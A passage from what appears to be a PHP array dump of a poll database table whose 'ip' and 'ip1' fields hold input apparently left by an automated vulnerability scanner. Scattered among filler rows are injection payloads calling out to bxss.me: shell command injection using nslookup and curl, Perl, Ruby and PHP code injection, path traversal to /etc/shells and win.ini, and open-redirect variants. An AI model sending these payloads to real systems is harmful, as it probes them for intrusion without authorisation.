'sondage_id' => '2'
),
(int) 3068 => array(
'id' => '3611',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3069 => array(
'id' => '3612',
'ip' => '45.137.76.29',
'ip1' => '1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg',
'sondage_id' => '2'
),
(int) 3070 => array(
'id' => '3613',
'ip' => '45.137.76.29',
'ip1' => 'xfs.bxss.me',
'sondage_id' => '2'
),
(int) 3071 => array(
'id' => '3614',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3072 => array(
'id' => '3615',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3073 => array(
'id' => '3616',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3074 => array(
'id' => '3617',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3075 => array(
'id' => '3618',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3076 => array(
'id' => '3619',
'ip' => '45.137.76.29',
'ip1' => 'Http://bxss.me/t/fit.txt',
'sondage_id' => '2'
),
(int) 3077 => array(
'id' => '3620',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3078 => array(
'id' => '3621',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3079 => array(
'id' => '3622',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3080 => array(
'id' => '3623',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3081 => array(
'id' => '3624',
'ip' => '45.137.76.29',
'ip1' => ''.gethostbyname(lc('hitwf'.'viacpgdt1615c.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(118).chr(89).chr(111).chr(68).'',
'sondage_id' => '2'
),
(int) 3082 => array(
'id' => '3625',
'ip' => '45.137.76.29',
'ip1' => 'http://bxss.me/t/fit.txt%3F.jpg',
'sondage_id' => '2'
),
(int) 3083 => array(
'id' => '3626',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3084 => array(
'id' => '3627',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3085 => array(
'id' => '3628',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3086 => array(
'id' => '3629',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3087 => array(
'id' => '3630',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3088 => array(
'id' => '3631',
'ip' => '45.137.76.29',
'ip1' => '".gethostbyname(lc("hitrv"."rxgirvjy97bc9.bxss.me."))."A".chr(67).chr(hex("58")).chr(120).chr(68).chr(122).chr(72)."',
'sondage_id' => '2'
),
(int) 3089 => array(
'id' => '3632',
'ip' => '45.137.76.29',
'ip1' => '/etc/shells',
'sondage_id' => '2'
),
(int) 3090 => array(
'id' => '3633',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3091 => array(
'id' => '3634',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3092 => array(
'id' => '3635',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3093 => array(
'id' => '3636',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3094 => array(
'id' => '3637',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3095 => array(
'id' => '3638',
'ip' => '45.137.76.29',
'ip1' => 'gethostbyname(lc('hithv'.'ptlrxwwp354eb.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(113).chr(69).chr(108).chr(77)',
'sondage_id' => '2'
),
(int) 3096 => array(
'id' => '3639',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3097 => array(
'id' => '3640',
'ip' => '45.137.76.29',
'ip1' => '../../../../../../../../../../../../../../etc/shells',
'sondage_id' => '2'
),
(int) 3098 => array(
'id' => '3641',
'ip' => '45.137.76.29',
'ip1' => 'HttP://bxss.me/t/xss.html?%00',
'sondage_id' => '2'
),
(int) 3099 => array(
'id' => '3642',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3100 => array(
'id' => '3643',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3101 => array(
'id' => '3644',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3102 => array(
'id' => '3645',
'ip' => '45.137.76.29',
'ip1' => 'echo ohatkx$()\ tyvkjn\nz^xyu||a #' &echo ohatkx$()\ tyvkjn\nz^xyu||a #|" &echo ohatkx$()\ tyvkjn\nz^xyu||a #',
'sondage_id' => '2'
),
(int) 3103 => array(
'id' => '3646',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3104 => array(
'id' => '3647',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3105 => array(
'id' => '3648',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3106 => array(
'id' => '3649',
'ip' => '45.137.76.29',
'ip1' => 'c:/windows/win.ini',
'sondage_id' => '2'
),
(int) 3107 => array(
'id' => '3650',
'ip' => '45.137.76.29',
'ip1' => 'bxss.me/t/xss.html?%00',
'sondage_id' => '2'
),
(int) 3108 => array(
'id' => '3651',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3109 => array(
'id' => '3652',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3110 => array(
'id' => '3653',
'ip' => '45.137.76.29',
'ip1' => '&echo ihozrv$()\ zpsysw\nz^xyu||a #' &echo ihozrv$()\ zpsysw\nz^xyu||a #|" &echo ihozrv$()\ zpsysw\nz^xyu||a #',
'sondage_id' => '2'
),
(int) 3111 => array(
'id' => '3654',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3112 => array(
'id' => '3655',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3113 => array(
'id' => '3656',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3114 => array(
'id' => '3657',
'ip' => '45.137.76.29',
'ip1' => 'bxss.me',
'sondage_id' => '2'
),
(int) 3115 => array(
'id' => '3658',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3116 => array(
'id' => '3659',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3117 => array(
'id' => '3660',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3118 => array(
'id' => '3661',
'ip' => '45.137.76.29',
'ip1' => '<pre class=&echo wyveor$()\ ryachs\nz^xyu||a #' &echo wyveor$()\ ryachs\nz^xyu||a #|" &echo wyveor$()\ ryachs\nz^xyu||a #',
'sondage_id' => '2'
),
(int) 3119 => array(
'id' => '3662',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3120 => array(
'id' => '3663',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3121 => array(
'id' => '3664',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3122 => array(
'id' => '3665',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3123 => array(
'id' => '3666',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3124 => array(
'id' => '3667',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3125 => array(
'id' => '3668',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3126 => array(
'id' => '3669',
'ip' => '45.137.76.29',
'ip1' => '|echo paqmxa$()\ vcblth\nz^xyu||a #' |echo paqmxa$()\ vcblth\nz^xyu||a #|" |echo paqmxa$()\ vcblth\nz^xyu||a #',
'sondage_id' => '2'
),
(int) 3127 => array(
'id' => '3670',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3128 => array(
'id' => '3671',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3129 => array(
'id' => '3672',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3130 => array(
'id' => '3673',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3131 => array(
'id' => '3674',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3132 => array(
'id' => '3675',
'ip' => '45.137.76.29',
'ip1' => '<pre class=|echo wzvlzf$()\ bihwtk\nz^xyu||a #' |echo wzvlzf$()\ bihwtk\nz^xyu||a #|" |echo wzvlzf$()\ bihwtk\nz^xyu||a #',
'sondage_id' => '2'
),
(int) 3133 => array(
'id' => '3676',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3134 => array(
'id' => '3677',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3135 => array(
'id' => '3678',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3136 => array(
'id' => '3679',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3137 => array(
'id' => '3680',
'ip' => '45.137.76.29',
'ip1' => '(nslookup -q=cname hitbqirbliuqr96e80.bxss.me||curl hitbqirbliuqr96e80.bxss.me))',
'sondage_id' => '2'
),
(int) 3138 => array(
'id' => '3681',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3139 => array(
'id' => '3682',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3140 => array(
'id' => '3683',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3141 => array(
'id' => '3684',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3142 => array(
'id' => '3685',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3143 => array(
'id' => '3686',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3144 => array(
'id' => '3687',
'ip' => '45.137.76.29',
'ip1' => '$(nslookup -q=cname hitysfhjdtxbq4f303.bxss.me||curl hitysfhjdtxbq4f303.bxss.me)',
'sondage_id' => '2'
),
(int) 3145 => array(
'id' => '3688',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3146 => array(
'id' => '3689',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3147 => array(
'id' => '3690',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3148 => array(
'id' => '3691',
'ip' => '45.137.76.29',
'ip1' => '&nslookup -q=cname hitnghnnywkcvcf4b9.bxss.me&'\"`0&nslookup -q=cname hitnghnnywkcvcf4b9.bxss.me&`'',
'sondage_id' => '2'
),
(int) 3149 => array(
'id' => '3692',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3150 => array(
'id' => '3693',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3151 => array(
'id' => '3694',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3152 => array(
'id' => '3695',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3153 => array(
'id' => '3696',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3154 => array(
'id' => '3697',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3155 => array(
'id' => '3698',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3156 => array(
'id' => '3699',
'ip' => '45.137.76.29',
'ip1' => '&(nslookup -q=cname hitfbrrupzhfo01ad0.bxss.me||curl hitfbrrupzhfo01ad0.bxss.me)&'\"`0&(nslookup -q=cname hitfbrrupzhfo01ad0.bxss.me||curl hitfbrrupzhfo01ad0.bxss.me)&`'',
'sondage_id' => '2'
),
(int) 3157 => array(
'id' => '3700',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3158 => array(
'id' => '3701',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3159 => array(
'id' => '3702',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3160 => array(
'id' => '3703',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3161 => array(
'id' => '3704',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3162 => array(
'id' => '3705',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3163 => array(
'id' => '3706',
'ip' => '45.137.76.29',
'ip1' => '|(nslookup -q=cname hitwvdiuoszdv5a9f3.bxss.me||curl hitwvdiuoszdv5a9f3.bxss.me)',
'sondage_id' => '2'
),
(int) 3164 => array(
'id' => '3707',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3165 => array(
'id' => '3708',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3166 => array(
'id' => '3709',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3167 => array(
'id' => '3710',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3168 => array(
'id' => '3711',
'ip' => '45.137.76.29',
'ip1' => '`(nslookup -q=cname hitgcvzxaxvdka7ff9.bxss.me||curl hitgcvzxaxvdka7ff9.bxss.me)`',
'sondage_id' => '2'
),
(int) 3169 => array(
'id' => '3712',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3170 => array(
'id' => '3713',
'ip' => '45.137.76.29',
'ip1' => '"+"A".concat(70-3).concat(22*4).concat(107).concat(72).concat(103).concat(66)+(require"socket"
Socket.gethostbyname("hitgq"+"aheqkqfk38c87.bxss.me.")[3].to_s)+"',
'sondage_id' => '2'
),
(int) 3171 => array(
'id' => '3714',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3172 => array(
'id' => '3715',
'ip' => '45.137.76.29',
'ip1' => ';(nslookup -q=cname hitbqcfpkqbmg0d0e0.bxss.me||curl hitbqcfpkqbmg0d0e0.bxss.me)|(nslookup -q=cname hitbqcfpkqbmg0d0e0.bxss.me||curl hitbqcfpkqbmg0d0e0.bxss.me)&(nslookup -q=cname hitbqcfpkqbmg0d0e0.bxss.me||curl hitbqcfpkqbmg0d0e0.bxss.me)',
'sondage_id' => '2'
),
(int) 3173 => array(
'id' => '3716',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3174 => array(
'id' => '3717',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3175 => array(
'id' => '3718',
'ip' => '45.137.76.29',
'ip1' => ''+'A'.concat(70-3).concat(22*4).concat(106).concat(67).concat(117).concat(83)+(require'socket'
Socket.gethostbyname('hitxe'+'hpkxzsalb9068.bxss.me.')[3].to_s)+'',
'sondage_id' => '2'
),
(int) 3176 => array(
'id' => '3719',
'ip' => '45.137.76.29',
'ip1' => '|(nslookup${IFS}-q${IFS}cname${IFS}hitqxkldfyqfu22664.bxss.me||curl${IFS}hitqxkldfyqfu22664.bxss.me)',
'sondage_id' => '2'
),
(int) 3177 => array(
'id' => '3720',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3178 => array(
'id' => '3721',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3179 => array(
'id' => '3722',
'ip' => '45.137.76.29',
'ip1' => ''A'.concat(70-3).concat(22*4).concat(109).concat(68).concat(121).concat(88)+(require'socket'
Socket.gethostbyname('hitsm'+'pmdloaif3db35.bxss.me.')[3].to_s)',
'sondage_id' => '2'
),
(int) 3180 => array(
'id' => '3723',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3181 => array(
'id' => '3724',
'ip' => '45.137.76.29',
'ip1' => '&(nslookup${IFS}-q${IFS}cname${IFS}hitxbvtkuzjnna6c43.bxss.me||curl${IFS}hitxbvtkuzjnna6c43.bxss.me)&'\"`0&(nslookup${IFS}-q${IFS}cname${IFS}hitxbvtkuzjnna6c43.bxss.me||curl${IFS}hitxbvtkuzjnna6c43.bxss.me)&`'',
'sondage_id' => '2'
),
(int) 3182 => array(
'id' => '3725',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3183 => array(
'id' => '3726',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3184 => array(
'id' => '3727',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3185 => array(
'id' => '3728',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3186 => array(
'id' => '3729',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3187 => array(
'id' => '3730',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3188 => array(
'id' => '3731',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3189 => array(
'id' => '3732',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3190 => array(
'id' => '3733',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3191 => array(
'id' => '3734',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3192 => array(
'id' => '3735',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3193 => array(
'id' => '3736',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3194 => array(
'id' => '3737',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3195 => array(
'id' => '3738',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3196 => array(
'id' => '3739',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3197 => array(
'id' => '3740',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3198 => array(
'id' => '3741',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3199 => array(
'id' => '3742',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3200 => array(
'id' => '3743',
'ip' => 'bxss.me',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3201 => array(
'id' => '3744',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3202 => array(
'id' => '3745',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3203 => array(
'id' => '3746',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3204 => array(
'id' => '3747',
'ip' => 'scimat.dz.bxss.me',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3205 => array(
'id' => '3748',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3206 => array(
'id' => '3749',
'ip' => ''"',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3207 => array(
'id' => '3750',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3208 => array(
'id' => '3751',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3209 => array(
'id' => '3752',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3210 => array(
'id' => '3753',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3211 => array(
'id' => '3754',
'ip' => '<!--',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3212 => array(
'id' => '3755',
'ip' => 'scimat.dz@bxss.me',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3213 => array(
'id' => '3756',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3214 => array(
'id' => '3757',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3215 => array(
'id' => '3758',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3216 => array(
'id' => '3759',
'ip' => 'scimat.dz:80@bxss.me',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3217 => array(
'id' => '3760',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3218 => array(
'id' => '3761',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3219 => array(
'id' => '3762',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3220 => array(
'id' => '3763',
'ip' => 'bxss.me\@scimat.dz',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3221 => array(
'id' => '3764',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3222 => array(
'id' => '3765',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3223 => array(
'id' => '3766',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3224 => array(
'id' => '3767',
'ip' => 'bxss.me#scimat.dz',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3225 => array(
'id' => '3768',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3226 => array(
'id' => '3769',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3227 => array(
'id' => '3770',
'ip' => '45.137.76.29',
'ip1' => ''"',
'sondage_id' => '2'
),
(int) 3228 => array(
'id' => '3771',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3229 => array(
'id' => '3772',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3230 => array(
'id' => '3773',
'ip' => '45.137.76.29',
'ip1' => '<!--',
'sondage_id' => '2'
),
(int) 3231 => array(
'id' => '3774',
'ip' => 'bxss.me?scimat.dz',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3232 => array(
'id' => '3775',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3233 => array(
'id' => '3776',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3234 => array(
'id' => '3777',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3235 => array(
'id' => '3778',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3236 => array(
'id' => '3779',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3237 => array(
'id' => '3780',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3238 => array(
'id' => '3781',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3239 => array(
'id' => '3782',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3240 => array(
'id' => '3783',
'ip' => '//bxss.me',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3241 => array(
'id' => '3784',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3242 => array(
'id' => '3785',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3243 => array(
'id' => '3786',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3244 => array(
'id' => '3787',
'ip' => '//scimat.dz.bxss.me',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3245 => array(
'id' => '3788',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3246 => array(
'id' => '3789',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3247 => array(
'id' => '3790',
'ip' => '//scimat.dz@bxss.me',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3248 => array(
'id' => '3791',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3249 => array(
'id' => '3792',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3250 => array(
'id' => '3793',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3251 => array(
'id' => '3794',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3252 => array(
'id' => '3795',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3253 => array(
'id' => '3796',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3254 => array(
'id' => '3797',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3255 => array(
'id' => '3798',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3256 => array(
'id' => '3799',
'ip' => '//bxss.me\@scimat.dz',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3257 => array(
'id' => '3800',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3258 => array(
'id' => '3801',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3259 => array(
'id' => '3802',
'ip' => '//bxss.me#scimat.dz',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3260 => array(
'id' => '3803',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3261 => array(
'id' => '3804',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3262 => array(
'id' => '3805',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3263 => array(
'id' => '3806',
'ip' => '//bxss.me?scimat.dz',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3264 => array(
'id' => '3807',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3265 => array(
'id' => '3808',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3266 => array(
'id' => '3809',
'ip' => '45.137.76.29',
'ip1' => ';assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));',
'sondage_id' => '2'
),
(int) 3267 => array(
'id' => '3810',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3268 => array(
'id' => '3811',
'ip' => '45.137.76.29',
'ip1' => '';print(md5(31337));$a='',
'sondage_id' => '2'
),
(int) 3269 => array(
'id' => '3812',
'ip' => '45.137.76.29',
'ip1' => '";print(md5(31337));$a="',
'sondage_id' => '2'
),
(int) 3270 => array(
'id' => '3813',
'ip' => 'http:bxss.me',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3271 => array(
'id' => '3814',
'ip' => '45.137.76.29',
'ip1' => '${@print(md5(31337))}',
'sondage_id' => '2'
),
(int) 3272 => array(
'id' => '3815',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3273 => array(
'id' => '3816',
'ip' => 'http:bxss.me/',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3274 => array(
'id' => '3817',
'ip' => '45.137.76.29',
'ip1' => '${@print(md5(31337))}\',
'sondage_id' => '2'
),
(int) 3275 => array(
'id' => '3818',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
